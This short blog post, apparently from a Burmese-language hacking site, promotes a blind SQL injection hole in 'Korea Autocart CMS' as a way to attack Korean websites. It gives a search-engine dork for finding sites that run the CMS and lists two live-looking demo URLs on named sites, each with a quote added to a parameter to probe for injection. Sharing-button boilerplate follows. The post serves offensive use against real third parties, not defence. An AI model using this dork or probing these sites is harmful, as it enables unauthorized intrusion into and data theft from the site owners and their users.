Korea Autocart CMS - Blind SQLI Vuln

Korea website ေတြကိုမွ ကပ်င္းခ်င္တယ္ဆုိရင္ေတာ့.. ဒီနည္းေလးကအဆင္ေျပပါလိမ့္မယ္။
Blind Sqli အမ်ဳိးအစားေလးတစ္မ်ဳိးပါဘဲ.

DORK : inurl:/autocart/market/

Dork သုံးတဲ့ေနရာမွာေတာ့  php?="Someone" ကိုလိုက္ရွာရပါလိမ့္မယ္ျပီးမွ exploit ေပါက္လုိက္စစ္ရမွာျဖစ္ပါတယ္..


ဥပမာဆုိဒ္ေလးေတြၾကည့္ၾကည့္လုိက္ပါအုံး..


Demo
http://www.iganaland.com/autocart/market/play/product_list.php?category_num=46'

http://www.kin.or.kr/autocart/market/board/board_read.php?index_no=2601&bbs_no=6'

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com